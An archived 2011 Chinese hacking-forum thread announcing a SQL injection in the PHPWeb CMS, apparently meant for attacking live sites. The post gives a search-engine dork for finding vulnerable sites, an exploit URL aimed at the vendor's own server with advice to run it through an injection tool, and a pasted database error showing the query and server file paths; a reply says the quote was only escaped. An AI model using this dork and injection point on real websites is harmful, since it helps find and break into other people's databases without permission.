【3.A.S.T】网络安全爱好者's Archiver

黑客学习

匿名 发表于 2011-3-22 20:39

PHPWeb企业智能建站系统注入漏洞

inurl:down/class/index.php?myord=1

EXp:http://www.phpweb.net/down/class/index.php?myord=1
直接放到工具里就能跑

官网信息

Database error: Invalid SQL: select * from pw_down_con where iffb='1' and catid!='0' order by 1\' desc limit 0,30
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' desc limit 0,30' at line 1)
#0 DBbase_Sql->halt(Invalid SQL: select * from pw_down_con where iffb='1' and catid!='0' order by 1\' desc limit 0,30) called at [E:\wwwroot\phpweb.net\includes\db.inc.php:54] #1 DBbase_Sql->query(select * from {P}_down_con where iffb='1' and catid!='0' order by 1\' desc limit 0,30) called at [E:\wwwroot\phpweb.net\down\module\DownQuery.php:105] #2 DownQuery() called at [E:\wwwroot\phpweb.net\includes\common.inc.php:551] #3 PrintPage() called at [E:\wwwroot\phpweb.net\down\class\index.php:11]
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in E:\wwwroot\phpweb.net\includes\db.inc.php on line 61

dreink 发表于 2011-3-24 22:40

唉!只是被转义了!

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.